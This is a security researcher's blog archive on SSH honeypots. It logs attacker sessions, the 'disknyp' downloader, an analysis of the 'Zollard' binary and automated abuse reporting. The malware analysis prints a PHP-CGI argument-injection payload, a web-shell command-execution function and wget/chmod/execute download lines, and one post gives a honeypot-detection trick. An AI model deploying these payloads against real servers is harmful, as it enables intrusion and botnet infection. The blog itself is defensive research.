Posts Tagged ‘Honeypots’

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..


Friday, January 10th, 2014

I am not up to date..

Looking at I see not only BitCoin storage, but also  FeatherCoin, LiteCoin, MemeCoin, Terra; FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to ( e66eb75f05328783c23745ef9d573de1 )

(I mentioned this program earlier (x86), but with a different md5-hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at

I am wondering why not even one of the virustotal-engines thinks, that this is malware..


disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:




(to be found at ) the download URL is already mentioned. Also clean-mx knows the file host; and on there is also a good look at these activities.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured  268 samples of disknyp.

Can be found on:

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from: beta271.exe

Also available for download on this webserver is a

svch.exe , probably infected for window-machines.

Virustotal says, only 24 from 48 antivir-vendors discover this


MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b




Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget
–2013-12-01 03:58:03–
Connecting to… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log – lines I found a wget – line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd

So I took a a look at this binary which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try “strings”:

first nothing new.. but then I saw:

74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Connection: close
$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);

What the heck..? And who is “zollard”?


#### Update  ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”” -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n



further on:

function myshellexec($cmd)
global $disablefunc;
$result = “”;
if (!empty($cmd))
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$
result); $result = join(“n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v
= @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_content
s(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc))
{$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_c
ontents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec(“wget -O /tmp/x86
myshellexec(“chmod +x /tmp/x86”);

Now the binary loads another binary, executes it and starts a webserver?

myshellexec(“wget -O /tmp/x86
myshellexec(“chmod +x /tmp/x86”);
HTTP/1.1 200 OK

A few lines more: It installes “iptables”, droppes every telnet connection ands starts

its own telnet-daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp –dport 23 -j DROP
iptables -A INPUT -p tcp –dport 23 -j DROP

In the end the program destroys its sources (rm -rf)  and runs in

mkdir -p

The last lines:

chmod +x
cp /bin/sh

So it ends up with some kind of crypto..

Virustotal shows a hitrate of 2 out of 47,  well, it is no windows binary..

Anyone seen this before? Who is zollard? Where did the binary got the necessary root-credentials

from?  I guess I have to take a further look..




There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l

which is from the log-lines:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6,
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6,


#### Update 2 ###


I executed the script on a linux vmware after adding “o+x” rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module


Immediatly the machine starts exchanging traffic with : 58455

ans starts also listening on this port 58455

Looks like my machine started scanning the ip-range 117.201.16.* on that port –

I receive answers from there…  No httpd oder telnetd daemons are listening in “ps”, which I expected.

The command “pstree” shows a httpd, though! Different childrens  are running, the last one has a connection

to Looks like the “ps”executable has been changed.

Will see, what else can be found. Now it is “St. Martin” – time..:-)










good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

Seems like a good source for information.

Tor exit node used for attack

Wednesday, March 21st, 2012

One recent reply to a kippo-attack complaint explained that the attacking ip is a TOR exit node.

Of course there is no way for us to find the real attacker when he/she is using TOR

for making this attack. Sad that this important service is abused in this way.

The system you have identified ( / is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

sshd complaints – update

Wednesday, March 14th, 2012

The automatic complaint-mechanism is now active. A X-ARF complaint is generated
for each session where a successful login into the kippo-honeypot produced some
recorded commands. The email address where the complaint is sent to is generated
like always – check own database, check ripe-website and check abusix.
Here is an example of the second mime-part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"

Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Version: 1.0.1

and the third MIME-part looks like this:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

uname -a
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *


Friday, March 9th, 2012

I am pretty close to start sending out complaints
for successful sshd – logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME-part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful complaints and are not overwhelmed by the
number of complaints..
Additionally the catched ips will be added in our blacklist,
just like in the attacks cachted by nepenthes.
Dionaea-attacks will come next 🙂